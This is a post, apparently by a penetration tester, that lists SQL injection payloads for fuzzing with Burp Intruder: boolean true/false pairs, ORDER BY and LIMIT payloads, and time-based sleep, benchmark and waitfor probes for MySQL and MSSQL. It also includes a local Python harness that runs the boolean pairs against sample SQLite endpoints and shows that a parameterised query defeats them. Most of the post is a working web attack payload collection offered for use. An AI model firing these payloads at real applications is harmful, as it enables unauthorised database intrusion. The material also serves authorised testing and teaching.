Sharing some SQL payloads I use in day-to-day testing

    1: BOOLEAN-BASED SQL INJECTION


    '
    "
    %df'
    %df"
    and 1=1
    and 1=2
    ' and '1'='1
    ' and '1'='2
    " and "1"="1
    " and "1"="2
    ) and (1=1
    ) and (1=2
    ') and ('1'='1
    ') and ('1'='2
    %' and 1=1 and '%'='
    %' and 1=2 and '%'='x
    %') and 1=1 and ('%'='
    %') and 1=2 and ('%'='x
    OR 1=1
    OR 1=2
    ' OR 1=1-- -
    ' OR 1=2-- -
    ) OR 1=1-- -
    ) OR 1=2-- -
    ') OR 1=1-- -
    ') OR 1=2-- -
    " OR "1"="1
    " OR "1"="2
    ' OR '1'='1
    ' OR '1'='2
    ) OR (1=1
    ) OR (1=2
    ') OR ('1'='1
    ') OR ('1'='2

    2: ORDER BY SQL INJECTION fuzz payloads

    (case when(1=1) then 1 else (select 1 union select 2) end)
    (case when(1=2) then 1 else (select 1 union select 2) end)
    ,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
    ,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
    ,1=if((1=1),1,(select 1 union select 2))
    ,1=if((1=2),1,(select 1 union select 2))
    ,If((1=1),1,(select 1 union select 2))-- -
    ,If((1=2),1,(select 1 union select 2))-- -
    ,If((1=1),sleep(4),(select 1 union select 2))-- -
    -IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
    -IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
    -(case when(1=1) then 1 else (select 1 union select 2) end)
    -(case when(1=2) then 1 else (select 1 union select 2) end)

    3: TIME-BASED SQL INJECTION

    '%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a
    -IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
    ';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ;SELECT sleep(4)
    );SELECT sleep(4)-- -
    ;SELECT sleep(4)-- -
    ;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ' AND SLEEP(4)%23
    AND sleep(4)
    ' AND sleep(4) AND '1'='1
    ') AND sleep(4) AND ('1'='1
    ) AND sleep(4) AND (1=1
    " AND sleep(4) AND "1"="
    ') and (select(0)from(select(sleep(4)))x)-- -
    and (select(0)from(select(sleep(4)))x)
    and (select(0)from(select(sleep(4)))x) and 1=1
    ' and (select(0)from(select(sleep(4)))x) and '1'='1
    " and (select(0)from(select(sleep(4)))x) and "1"="1
    ) and (select(0)from(select(sleep(4)))x) and (1=1
    ') and (select(0)from(select(sleep(4)))x) and ('1'='1
    rlike (select(0)from(select(sleep(4)))x) and 1=1
    ' rlike (select(0)from(select(sleep(4)))x) and '1'='1
    ) rlike (select(0)from(select(sleep(4)))x) and (1=1
    ') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
    ;waitfor delay '0:0:4' -- -
    ';waitfor delay '0:0:4' -- -
    );waitfor delay '0:0:4' -- -
    ');waitfor delay '0:0:4' -- -
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT * FROM(SELECT(sleep(4)))lWuP)

    4: LIMIT SQL INJECTION

    procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

    Usage needs no explanation: load them into Burp Intruder and fuzz. Two things to keep in mind when picking from the list: the `sleep()`/`benchmark()`/`rlike` entries target MySQL and the `waitfor delay` entries target MSSQL, and the LIMIT payload relies on PROCEDURE ANALYSE, which MySQL 8.0 removed, so it only works against 5.x targets.
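The boolean pairs in section 1 and the Intruder workflow above come down to one check: send the true half and the false half of a pair in the same position and see whether the responses differ. The harness below is an added example, not code from the original post. It uses SQLite as a stand-in for the MySQL target the payloads were written for (so the MySQL-only probes such as `%df'`, `sleep()` and `rlike` are not exercised), a constructed `users` table, and three hypothetical endpoints: two that concatenate input into a query in different quoting contexts, and one that binds it with a parameter.

```python
"""Offline harness for the boolean (true/false) payload pairs from section 1.

Added example, not code from the original post. SQLite stands in for the
MySQL target those payloads were written for; the quote-context logic that
the boolean pairs rely on is the same.
"""
import sqlite3

# Constructed sample table standing in for a real application's users table.
ROWS = [(1, "admin"), (2, "alice"), (3, "bob")]

# True/false pairs copied from section 1. Each pair targets one quoting
# context; a pair is a hit when its two halves produce different responses.
PAIRS = [
    ("' and '1'='1", "' and '1'='2"),                    # closes a '...' string
    ("') and ('1'='1", "') and ('1'='2"),                # closes a ('...') string
    ("' OR '1'='1", "' OR '1'='2"),                      # closes a '...' string
    ("%' and 1=1 and '%'='", "%' and 1=2 and '%'='x"),   # closes a LIKE '%...%'
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


CONN = make_db()


def run(sql, params=()):
    """Execute and reduce the outcome to a comparable value, the way you would
    compare status/length of HTTP responses in Intruder. All errors fold into
    one value so that two different error texts do not count as a signal."""
    try:
        return ("rows", tuple(CONN.execute(sql, params).fetchall()))
    except sqlite3.Error:
        return ("error",)


# Hypothetical endpoints (assumed for this example). The two "vulnerable"
# ones concatenate user input into the query in different quoting contexts;
# the safe one binds it as a parameter.
def vulnerable_eq(user_input):
    return run(f"SELECT id, name FROM users WHERE name = '{user_input}' ORDER BY id")


def vulnerable_like(user_input):
    return run(f"SELECT id, name FROM users WHERE name LIKE '%{user_input}%' ORDER BY id")


def safe_eq(user_input):
    return run("SELECT id, name FROM users WHERE name = ? ORDER BY id", (user_input,))


def detect_injectable(endpoint, base="admin"):
    """Append each pair to a known-good value and return the true halves whose
    response differs from their false half: those contexts are injectable."""
    hits = []
    for true_p, false_p in PAIRS:
        if endpoint(base + true_p) != endpoint(base + false_p):
            hits.append(true_p)
    return hits


if __name__ == "__main__":
    for ep in (vulnerable_eq, vulnerable_like, safe_eq):
        print(f"{ep.__name__:15s} injectable via: {detect_injectable(ep)}")
```

Run against `vulnerable_eq`, the `'...'` pairs fire (`' and '1'='1` returns the admin row while `' and '1'='2` returns nothing; `' OR '1'='1` returns every row) and the `')` pair does not, because both halves are syntax errors in that context. Against `vulnerable_like` only the `%'` pair fires: `' and '1'='1` lands as `'1'='1%'`, which is false for both halves, and `' OR '1'='1` leaves the `LIKE '%admin'` match intact for both halves, so neither produces a diff. That is why the list carries one pair per quoting context. The parameterized endpoint returns the same empty result for every payload and yields no hits.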

Original post: https://www.cnblogs.com/depycode/p/5576204.html